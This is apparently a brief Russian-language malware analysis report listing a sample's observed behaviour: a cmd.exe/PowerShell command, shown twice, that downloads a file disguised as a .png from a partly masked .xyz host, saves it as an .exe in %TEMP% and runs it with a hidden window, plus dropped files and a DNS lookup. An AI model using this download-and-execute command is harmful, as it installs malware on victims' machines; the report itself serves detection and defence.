Техническая информация
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.ct##y.xyz/jam/soapdoz.png','%TEMP%\soapdoz.exe');%TEMP%\soapdoz.exe
- %TEMP%\trbatehtqevyaw.sct
- %TEMP%\1.exe
- http://www.ct##y.xyz/jam/soapdoz.png
- DNS ASK ct##y.xyz
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.ct##y.xyz/jam/soapdoz.png','%TEMP%\soapdoz.exe');%TEMP%\soapdoz.exe' (со скрытым окном)